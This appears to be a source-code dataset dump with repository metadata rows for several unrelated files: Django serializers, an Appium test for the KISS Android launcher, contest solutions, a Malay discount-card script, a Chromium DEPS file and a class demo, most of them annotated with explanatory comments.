7c5e77e8e8708914b94c95c7da9fc3574ad25c8c | a14795a79fd8f39cede7fa5eb86f9717b5c289c2 | /backend/course/api/v1/serializers.py | 977b3866deffb183b0133225485e9b022f8b7e3e | [] | no_license | crowdbotics-apps/dearfuturescientist-21123 | fcdbe95a9cd9e8713198b6accbeeb56aa5b0b2d4 | 5b282411ebaf39580b938f6678afc8a36e34aba4 | refs/heads/master | 2022-12-30T20:23:25.888830 | 2020-10-05T19:00:56 | 2020-10-05T19:00:56 | 301,510,630 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,622 | py | from rest_framework import serializers
from course.models import (
Recording,
Event,
Subscription,
Course,
Group,
Module,
PaymentMethod,
SubscriptionType,
Enrollment,
Lesson,
Category,
)
class LessonSerializer(serializers.ModelSerializer):
    """Serializes every field of the Lesson model."""
    class Meta:
        model = Lesson
        fields = "__all__"
class CategorySerializer(serializers.ModelSerializer):
    """Serializes every field of the Category model."""
    class Meta:
        model = Category
        fields = "__all__"
class SubscriptionTypeSerializer(serializers.ModelSerializer):
    """Serializes every field of the SubscriptionType model."""
    class Meta:
        model = SubscriptionType
        fields = "__all__"
class GroupSerializer(serializers.ModelSerializer):
    """Serializes every field of the Group model."""
    class Meta:
        model = Group
        fields = "__all__"
class EventSerializer(serializers.ModelSerializer):
    """Serializes every field of the Event model."""
    class Meta:
        model = Event
        fields = "__all__"
class RecordingSerializer(serializers.ModelSerializer):
    """Serializes every field of the Recording model."""
    class Meta:
        model = Recording
        fields = "__all__"
class PaymentMethodSerializer(serializers.ModelSerializer):
    """Serializes every field of the PaymentMethod model."""
    class Meta:
        model = PaymentMethod
        fields = "__all__"
class CourseSerializer(serializers.ModelSerializer):
    """Serializes every field of the Course model."""
    class Meta:
        model = Course
        fields = "__all__"
class SubscriptionSerializer(serializers.ModelSerializer):
    """Serializes every field of the Subscription model."""
    class Meta:
        model = Subscription
        fields = "__all__"
class EnrollmentSerializer(serializers.ModelSerializer):
    """Serializes every field of the Enrollment model."""
    class Meta:
        model = Enrollment
        fields = "__all__"
class ModuleSerializer(serializers.ModelSerializer):
    """Serializes every field of the Module model."""
    class Meta:
        model = Module
        fields = "__all__"
| [
"[email protected]"
] | |
def areRecycled(number1, number2):
    """Return True if *number2* is a nontrivial-or-full rotation of *number1*.

    Both arguments are lists of digit characters.  Tries len(number2)
    successive right-rotations of number1, so equal lists match after the
    full cycle.

    Bug fix: the original rotated *number1* itself (an alias), mutating the
    caller's list — and leaving it rotated on an early match.  This version
    works on a copy and also drops the unused ``recycled`` local.
    """
    rotated = list(number1)
    for _ in range(len(number2)):
        rotated.insert(0, rotated.pop())
        if rotated == number2:
            return True
    return False
# Google Code Jam "Recycled Numbers" driver: for each case read the range
# [limInferior, limSuperior], count pairs (j, k) with j < k where k is a
# rotation of j, and write "Case #i: count" to output.dat.
# NOTE(review): neither file handle is ever closed, and the pairwise scan
# is quadratic in the range size — adequate only for the small input set.
archi = open("C-small-attempt2.in","r")
cant = open("output.dat","w")
cases = int(archi.readline().split()[0])
for i in range(cases):
    cont = 0
    label = "Case #" + str(i+1) + ": "
    numeros = archi.readline().replace('\n','').split(" ")
    limInferior = int(numeros[0])
    limSuperior = int(numeros[1])
    j=limInferior
    while j < limSuperior:
        k=j+1;
        while k<= limSuperior:
            # Compare the digit lists of k and j for rotational equality.
            if areRecycled(list(str(k)),list(str(j))):
                cont = cont + 1
            k = k + 1
        j = j + 1
    label = label + str(cont) + '\n'
    cant.writelines(label)
| [
"[email protected]"
] | |
94495ae9bda52bd44a846dc64ca184a3dab2436d | 32eeb97dff5b1bf18cf5be2926b70bb322e5c1bd | /benchmark/KISS/testcase/firstcases/testcase9_006.py | 61760f5dab43c2ef13a77980e6ed785b691254ad | [] | no_license | Prefest2018/Prefest | c374d0441d714fb90fca40226fe2875b41cf37fc | ac236987512889e822ea6686c5d2e5b66b295648 | refs/heads/master | 2021-12-09T19:36:24.554864 | 2021-12-06T12:46:14 | 2021-12-06T12:46:14 | 173,225,161 | 5 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,084 | py | #coding=utf-8
import os
import subprocess
import time
import traceback
from appium import webdriver
from appium.webdriver.common.touch_action import TouchAction
from selenium.common.exceptions import NoSuchElementException, WebDriverException
# Appium capabilities: launch KISS (fr.neamar.kiss) on an Android 4.4
# emulator with Jacoco coverage instrumentation enabled; noReset keeps
# the app's existing data between runs.
desired_caps = {
'platformName' : 'Android',
'deviceName' : 'Android Emulator',
'platformVersion' : '4.4',
'appPackage' : 'fr.neamar.kiss',
'appActivity' : 'fr.neamar.kiss.MainActivity',
'resetKeyboard' : True,
'androidCoverage' : 'fr.neamar.kiss/fr.neamar.kiss.JacocoInstrumentation',
'noReset' : True
}
def command(cmd, timeout=5):
    """Start *cmd* in a shell, give it *timeout* seconds, then terminate it."""
    proc = subprocess.Popen(
        cmd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE, shell=True)
    time.sleep(timeout)
    proc.terminate()
def getElememt(driver, str) :
    """Find an element by UiAutomator selector, retrying up to 5 times.

    Sleeps 1s between attempts; after 5 failures taps (50, 50) (presumably
    to dismiss an overlay — confirm) and tries once more, letting any final
    exception propagate.  (sic: function-name typo and builtin-shadowing
    ``str`` parameter are kept for existing call sites.)
    """
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str)
        except NoSuchElementException:
            time.sleep(1)  # give the UI time to settle before retrying
        else:
            return element
    os.popen("adb shell input tap 50 50")  # nudge the screen, then final attempt
    element = driver.find_element_by_android_uiautomator(str)
    return element
def getElememtBack(driver, str1, str2) :
    """Find an element by primary selector *str1*, falling back to *str2*.

    Tries str1 twice (1s apart), then str2 five times; finally taps (50, 50)
    and makes one last attempt with str2, letting any exception propagate.
    (sic: function-name typo kept for existing call sites.)
    """
    for i in range(0, 2, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str1)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    for i in range(0, 5, 1):
        try:
            element = driver.find_element_by_android_uiautomator(str2)
        except NoSuchElementException:
            time.sleep(1)
        else:
            return element
    os.popen("adb shell input tap 50 50")  # nudge the screen, then final attempt
    element = driver.find_element_by_android_uiautomator(str2)
    return element
def swipe(driver, startxper, startyper, endxper, endyper) :
    """Swipe between two points given as fractions of the screen size.

    The four *per* arguments are 0..1 proportions of the window width/height.
    Retries once after 1s if the first attempt raises WebDriverException.
    """
    size = driver.get_window_size()
    width = size["width"]
    height = size["height"]
    try:
        driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
                     end_y=int(height * endyper), duration=2000)
    except WebDriverException:
        time.sleep(1)
        driver.swipe(start_x=int(width * startxper), start_y=int(height * startyper), end_x=int(width * endxper),
                     end_y=int(height * endyper), duration=2000)
    return
# testcase006: open the KISS launcher menu and tap "Device settings",
# printing OK/FAIL and timings; Jacoco coverage is dumped afterwards and
# any foreground app the test left behind is force-stopped.
# (This file is Python 2 — note the print statements and except syntax.)
try :
    starttime = time.time()
    driver = webdriver.Remote('http://localhost:4723/wd/hub', desired_caps)
    element = getElememt(driver, "new UiSelector().resourceId(\"fr.neamar.kiss:id/menuButton\").className(\"android.widget.ImageView\")")
    TouchAction(driver).tap(element).perform()
    element = getElememtBack(driver, "new UiSelector().text(\"Device settings\")", "new UiSelector().className(\"android.widget.TextView\").instance(2)")
    TouchAction(driver).tap(element).perform()
except Exception, e:
    print 'FAIL'
    print 'str(e):\t\t', str(e)
    print 'repr(e):\t', repr(e)
    print traceback.format_exc()
else:
    print 'OK'
finally:
    cpackage = driver.current_package
    endtime = time.time()
    print 'consumed time:', str(endtime - starttime), 's'
    # Broadcast to the instrumented app to dump Jacoco coverage for 9_006.
    command("adb shell am broadcast -a com.example.pkg.END_EMMA --es name \"9_006\"")
    jacocotime = time.time()
    print 'jacoco time:', str(jacocotime - endtime), 's'
    driver.quit()
    # Force-stop whatever package ended up in the foreground, if not KISS.
    if (cpackage != 'fr.neamar.kiss'):
        cpackage = "adb shell am force-stop " + cpackage
        os.popen(cpackage)
"[email protected]"
] | |
29ef78376dd563998f38b02a60deaeb27c911a9b | ec84daf26e137b46fa77c18750c99e886ce8c6db | /upgradedDiskaun.py | 6022d8d2051d8a0079196415a5c74c9c28432ee3 | [] | no_license | SharvahGobithasan/Kad-Diskaun-F2-ASK | 8eeb272f6f457765c3da42a2293f47b6dc9a4ed1 | 8575769a413daaaea28b62874c0595f5aa31ff6a | refs/heads/master | 2022-10-15T07:44:45.786304 | 2020-06-11T07:49:31 | 2020-06-11T07:49:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,002 | py | '''
sharvah 11/6/2020
'''
# Discount-card checker: asks for the card type and reward points, then
# prints the discount percentage.  Prompts and messages are in Malay and
# are deliberately left untranslated (they are runtime output).
from os import system
system('cls') # to clear the screen ('cls' is the Windows clear command)
kad = input("Masukkan jenis kad diskaun anda:")
x=kad.casefold()  # case-insensitive comparison of the card type
#print(x)
try:
    # NOTE(review): the unconditional `break` below means this loop body
    # runs exactly once; the `while True` only provides a break target.
    while True:
        if x == "kad premium":
            mata = int(input("Masukkan mata ganjaran kad anda:"))
            # Map reward points to a discount tier: 100 points per 10%,
            # capped at 50%.
            if(mata >= 500):
                print("Peratus diskaun ialah 50%")
            elif(mata >= 400):
                print("Peratus diskaun ialah 40%")
            elif(mata >= 300):
                print("Peratus diskaun ialah 30%")
            elif(mata >= 200):
                print("Peratus diskaun ialah 20%")
            elif (mata >= 100):
                print("Peratus diskaun ialah 10%")
            else:
                print("Maaf mata anda tidak mencukupi untuk mendapat diskaun")
        else:
            print("Maaf anda memerlukan kad premium untuk mendapat diskaun")
        break
except KeyboardInterrupt: # If CTRL+C is pressed, exit cleanly:
    system('cls')
    print('Bye!')
| [
"[email protected]"
] | |
263ca80ed3ebdcc465692fef40cd71b494ac004c | ca7aa979e7059467e158830b76673f5b77a0f5a3 | /Python_codes/p03807/s835726532.py | c603899438bd501bb5871b424daa8724dfe35dfc | [] | no_license | Aasthaengg/IBMdataset | 7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901 | f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8 | refs/heads/main | 2023-04-22T10:22:44.763102 | 2021-05-13T17:27:22 | 2021-05-13T17:27:22 | 367,112,348 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | N = int(input())
# Count the odd values among the integers on the input line; print "YES"
# when that count is even, "NO" otherwise.  (N is read on the line above.)
a = list(map(int,input().split()))
odd = 0  # running count of odd entries
for i in range(N):
    if a[i] % 2:
        odd += 1
if odd % 2:
    print('NO')
else:
    print('YES')
"[email protected]"
] | |
984769b8bfd917b7f3a450664dda8ca833caabdc | b7f3edb5b7c62174bed808079c3b21fb9ea51d52 | /components/safe_browsing/content/web_ui/DEPS | c4dfe28ac40a5b9fd60086f5f0bb2d45f1b6d99f | [
"BSD-3-Clause"
] | permissive | otcshare/chromium-src | 26a7372773b53b236784c51677c566dc0ad839e4 | 64bee65c921db7e78e25d08f1e98da2668b57be5 | refs/heads/webml | 2023-03-21T03:20:15.377034 | 2020-11-16T01:40:14 | 2020-11-16T01:40:14 | 209,262,645 | 18 | 21 | BSD-3-Clause | 2023-03-23T06:20:07 | 2019-09-18T08:52:07 | null | UTF-8 | Python | false | false | 409 | include_rules = [
"+components/enterprise/common/proto/connectors.pb.h",
"+components/grit/components_resources.h",
"+components/password_manager/core/browser/hash_password_manager.h",
"+components/user_prefs",
"+components/safe_browsing/core/proto/csd.pb.h",
"+components/strings/grit/components_strings.h",
"+components/grit/components_scaled_resources.h",
"+components/safe_browsing_db",
]
| [
"[email protected]"
] | ||
def prime(n):
    """Trial-division primality test: True iff n is a prime number.

    Bug fix: in the original, the ``else: return True`` of the n >= 9 branch
    was attached to the ``if`` inside the loop rather than to the ``for``,
    so the function returned True as soon as one candidate divisor failed —
    e.g. prime(9), prime(15) and prime(25) were all reported True.  A single
    loop over 2..sqrt(n) now covers every n correctly.
    """
    if n <= 1:
        return False
    for i in range(2, int(n ** 0.5) + 1):
        if n % i == 0:
            return False
    return True
# Project Euler 46 search: walk odd numbers from 35 upward, skipping primes,
# until an odd composite n is found that has no decomposition n = p + 2*i*i
# with p prime ("Goldbach's other conjecture").
n = 35
while True:
    if prime(n):
        n += 2  # primes don't count; advance to the next odd number
    else:
        # Try every decomposition n = p + 2*i*i with 1 <= i <= sqrt(n/2).
        for i in range(1,int((n/2)**0.5)+1):
            if prime(n - 2 * i**2):
                break
        else:
            break  # no decomposition found: n is the answer
        n += 2
print (n)
"[email protected]"
] | |
4ef0a26a6bf9821f4d1258569482c2b9781bc3ef | ba5377e5adf9f14944c0827166e3d17bb0aea64e | /26class_04.py | cfeb596a9a586b36d557816a855e3f06d1db0f54 | [] | no_license | ArhamChouradiya/Python-Course | 34aaaa780cdb9beef2722d15c7e1c73dd2053323 | 503f3c3832617b818f061e3db4cd0f5e2ca24f52 | refs/heads/master | 2020-12-06T01:28:01.926712 | 2020-01-07T10:32:55 | 2020-01-07T10:32:55 | 232,300,438 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 318 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Sun Aug 4 13:15:19 2019
@author: arham
"""
class student:
    """Minimal demo class: a shared class attribute plus per-instance data."""
    major= "CSE"  # class attribute shared by every instance
    def __init__(self,rollno,name):
        self.rollno=rollno  # per-instance roll number
        self.name=name      # per-instance name
# Demo: the class attribute 'major' is reachable both through an instance
# and through the class itself.
s1=student(1,"JOhn")
s2=student(2,"jane")
print(s1.major)
print(student.major)
"[email protected]"
] |
Subsets and Splits